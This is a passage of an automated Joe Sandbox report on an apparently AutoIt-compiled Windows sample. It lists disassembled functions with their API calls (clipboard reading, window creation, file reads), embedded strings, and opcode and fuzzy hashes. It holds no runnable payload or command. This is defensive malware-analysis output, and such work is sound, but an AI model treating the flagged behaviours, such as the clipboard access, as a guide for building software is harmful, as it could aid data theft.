                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                • String ID: ($,$tooltips_class32
                                                                                                • API String ID: 225202481-3320066284
                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                • String ID:
                                                                                                • API String ID: 15083398-0
                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                • API String ID: 867697134-3359773793
                                                                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                • API String ID: 1503153545-1459072770
                                                                                                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                • API String ID: 790654849-32604322
                                                                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                • _fseek.LIBCMT ref: 00452B3B
                                                                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                • _wcscat.LIBCMT ref: 00452BC5
                                                                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                • _wcscat.LIBCMT ref: 00452C07
                                                                                                • _wcscat.LIBCMT ref: 00452C1C
                                                                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                • String ID:
                                                                                                • API String ID: 2054058615-0
                                                                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: 0
                                                                                                • API String ID: 2353593579-4108050209
                                                                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                • String ID:
                                                                                                • API String ID: 1744303182-0
                                                                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                • API String ID: 4163708885-3819984048
                                                                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                • API String ID: 0-1896584978
                                                                                                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                • API String ID: 2485277191-404129466
                                                                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
